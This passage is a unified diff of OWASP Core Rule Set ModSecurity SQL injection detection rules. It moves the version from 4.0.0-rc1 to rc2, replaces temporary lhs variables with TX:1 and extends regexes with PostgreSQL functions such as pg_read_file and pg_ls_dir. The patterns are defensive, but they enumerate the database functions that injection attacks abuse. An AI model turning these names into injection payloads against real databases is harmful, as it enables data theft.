     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}'"
@@ -426,7 +445,7 @@ SecRule ARGS_NAMES|ARGS|REQUEST_FILENAME|XML:/* "@rx (?i)!=|&&|\|\||>[=->]|<(?:<
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -446,12 +465,11 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
-    setvar:'tx.942130_lhs=%{TX.1}',\
     setvar:'tx.942130_matched_var_name=%{matched_var_name}',\
     chain"
-    SecRule TX:942130_lhs "@streq %{TX.2}" \
+    SecRule TX:1 "@streq %{TX.2}" \
         "t:none,\
         setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -471,13 +489,12 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\v\"'-\)`]*?\b([0-9A-Z_a-z]+)\b[\s\v\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     multiMatch,\
-    setvar:'tx.942131_lhs=%{TX.1}',\
     setvar:'tx.942131_matched_var_name=%{matched_var_name}',\
     chain"
-    SecRule TX:942131_lhs "!@streq %{TX.2}" \
+    SecRule TX:1 "!@streq %{TX.2}" \
         "t:none,\
         setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -497,7 +514,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -517,7 +534,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -537,7 +554,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -557,7 +574,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -577,11 +594,11 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\)[\s\v]*?when[\s\v]*?[0-9]+[\s\v]*?then|[\"'`][\s\v]*?(?:[#\{]|--)|/\*![\s\v]?[0-9]+|\b(?:b(?:inary[\s\v]*?\([\s\v]*?[0-9]|etween[\s\v]+[\s\v]*?[0-9A-Z_a-z]+\()|cha?r[\s\v]*?\([\s\v]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|r(?:egexp|like))[\s\v]+[\s\v]*?[0-9A-Z_a-z]+\()|(?:\|\||&&)[\s\v]+[\s\v]*?[0-9A-Z_a-z]+\(" \
+SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\)[\s\v]*?when[\s\v]*?[0-9]+[\s\v]*?then|[\"'`][\s\v]*?(?:[#\{]|--)|/\*![\s\v]?[0-9]+|\b(?:(?:binary|cha?r)[\s\v]*?\([\s\v]*?[0-9]|(?:and|n(?:and|ot)|(?:xx?)?or|div|like|between|r(?:egexp|like))[\s\v]+[0-9A-Z_a-z]+\()|(?:\|\||&&)[\s\v]*?[0-9A-Z_a-z]+\(" \
     "id:942300,\
     phase:2,\
     block,\
@@ -597,7 +614,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -617,7 +634,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -637,7 +654,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -657,7 +674,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -677,7 +694,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -697,7 +714,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -717,7 +734,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_H
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -737,7 +754,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -757,7 +774,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -777,7 +794,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -797,7 +814,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -817,7 +834,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -837,7 +854,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -857,7 +874,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -877,10 +894,10 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     chain"
-    SecRule MATCHED_VARS "!@rx ^ey[A-Z-a-z0-9-_]+[.]ey[A-Z-a-z0-9-_]+[.][A-Z-a-z0-9-_]+$" \
+    SecRule MATCHED_VARS "!@rx ^ey[\-0-9A-Z_a-z]+\.ey[\-0-9A-Z_a-z]+\.[\-0-9A-Z_a-z]+$" \
         "t:none,\
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}',\
         setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}'"
@@ -900,7 +917,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -920,7 +937,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -940,7 +957,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -960,11 +977,10 @@ SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
-    setvar:'tx.942521_lhs=%{TX.1}',\
     chain"
-    SecRule TX:942521_lhs "@rx ^(?:and|or)$" \
+    SecRule TX:1 "@rx ^(?:and|or)$" \
         "t:none,\
         setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
         setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -984,7 +1000,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ^.*?\x5c['\"`](?:.*?['\"`])?\s*(?:and|or)\b"
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1004,11 +1020,11 @@ SecRule REQUEST_BASENAME|REQUEST_FILENAME "@detectSQLi" \
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
-SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|time(?:stamp)?|user)))|d(?:a(?:t(?:abase|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t_(?:format|lock))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull))|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|sleep)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
+SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(?:dat|tim)e|es_(?:de|en)crypt|s(?:cii(?:str)?|in)|tan2?)|b(?:enchmark|i(?:n_to_num|t_(?:and|count|length|x?or)))|c(?:har(?:acter)?_length|iel(?:ing)?|o(?:alesce|ercibility|llation|(?:mpres)?s|n(?:cat(?:_ws)?|nection_id|v(?:ert(?:_tz)?)?)|t)|r32|ur(?:(?:dat|tim)e|rent_(?:date|setting|time(?:stamp)?|user)))|d(?:a(?:t(?:abase(?:_to_xml)?|e(?:_(?:add|format|sub)|diff))|y(?:name|of(?:month|week|year)))|count|e(?:code|grees|s_(?:de|en)crypt)|ump)|e(?:lt|n(?:c(?:ode|rypt)|ds_?with)|x(?:p(?:ort_set)?|tract(?:value)?))|f(?:i(?:el|n)d_in_set|ound_rows|rom_(?:base64|days|unixtime))|g(?:e(?:ometrycollection|t(?:_(?:format|lock)|pgusername))|(?:r(?:eates|oup_conca)|tid_subse)t)|hex(?:toraw)?|i(?:fnull|n(?:et6?_(?:aton|ntoa)|s(?:ert|tr)|terval)|s(?:_(?:(?:free|used)_lock|ipv(?:4(?:_(?:compat|mapped))?|6)|n(?:ot(?:_null)?|ull)|superuser)|null))|json(?:_(?:a(?:gg|rray(?:_(?:elements(?:_text)?|length))?)|build_(?:array|object)|e(?:ac|xtract_pat)h(?:_text)?|object(?:_(?:agg|keys))?|populate_record(?:set)?|strip_nulls|t(?:o_record(?:set)?|ypeof))|b(?:_(?:array(?:_(?:elements(?:_text)?|length))?|build_(?:array|object)|object(?:_(?:agg|keys))?|e(?:ac|xtract_pat)h(?:_text)?|insert|p(?:ath_(?:(?:exists|match)(?:_tz)?|query(?:_(?:(?:array|first)(?:_tz)?|tz))?)|opulate_record(?:set)?|retty)|s(?:et(?:_lax)?|trip_nulls)|t(?:o_record(?:set)?|ypeof)))?|path)?|l(?:ast_(?:day|inser_id)|case|e(?:as|f)t|i(?:kel(?:ihood|y)|nestring)|o(?:_(?:from_bytea|put)|ad_file|ca(?:ltimestamp|te)|g(?:10|2)|wer)|pad|trim)|m(?:a(?:ke(?:_set|date)|ster_pos_wait)|d5|i(?:crosecon)?d|onthname|ulti(?:linestring|po(?:int|lygon)))|n(?:ame_const|ot_in|ullif)|o(?:ct(?:et_length)?|(?:ld_passwo)?rd)|p(?:eriod_(?:add|diff)|g_(?:client_encoding|(?:databas|read_fil)e|l(?:argeobject|s_dir)|sleep|user)|o(?:(?:lyg|siti)on|w)|rocedure_analyse)|qu(?:arter|ery_to_xml|ote)|r(?:a(?:dians|nd|wtohex)|elease_lock|ow_(?:count|to_json)|pad|trim)|s(?:chema|e(?:c_to_time|ssion_user)|ha[1-2]?|in|oundex|pace|q(?:lite_(?:compileoption_(?:get|used)|source_id)|rt)|t(?:arts_?with|d(?:dev_(?:po|sam)p)?|r(?:_to_date|cmp))|ub(?:(?:dat|tim)e|str(?:ing(?:_index)?)?)|ys(?:date|tem_user))|t(?:ime(?:_(?:format|to_sec)|diff|stamp(?:add|diff)?)|o(?:_(?:base64|jsonb?)|n?char|(?:day|second)s)|r(?:im|uncate))|u(?:case|n(?:compress(?:ed_length)?|hex|i(?:str|x_timestamp)|likely)|(?:pdatexm|se_json_nul)l|tc_(?:date|time(?:stamp)?)|uid(?:_short)?)|var(?:_(?:po|sam)p|iance)|we(?:ek(?:day|ofyear)|ight_string)|xmltype|yearweek)[^0-9A-Z_a-z]*\(" \
     "id:942152,\
     phase:1,\
     block,\
@@ -1024,7 +1040,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)\b(?:a(?:dd(
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1044,7 +1060,7 @@ SecRule REQUEST_HEADERS:Referer|REQUEST_HEADERS:User-Agent "@rx (?i)create[\s\v]
     tag:'OWASP_CRS',\
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'"
@@ -1066,7 +1082,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1086,7 +1102,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
@@ -1106,7 +1122,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|!REQUEST_COOKIES:/_pk_ref/|REQU
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1126,7 +1142,7 @@ SecRule ARGS_NAMES|ARGS|XML:/* "@rx ((?:[~!@#\$%\^&\*\(\)\-\+=\{\}\[\]\|:;\"'´
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}'"
@@ -1146,7 +1162,7 @@ SecRule ARGS "@rx \W{4}" \
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'WARNING',\
     setvar:'tx.sql_injection_score=+%{tx.warning_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.warning_anomaly_score}'"
@@ -1166,7 +1182,7 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME
     tag:'capec/1000/152/248/66',\
     tag:'PCI/6.5.2',\
     tag:'paranoia-level/3',\
-    ver:'OWASP_CRS/4.0.0-rc1',\
+    ver:'OWASP_CRS/4.0.0-rc2',\
     severity:'CRITICAL',\
     setvar:'tx.sql_injection_score=+%{tx.critical_anomaly_score}',\
     setvar:'tx.inbound_anomaly_score_pl3=+%{tx.critical_anomaly_score}'"
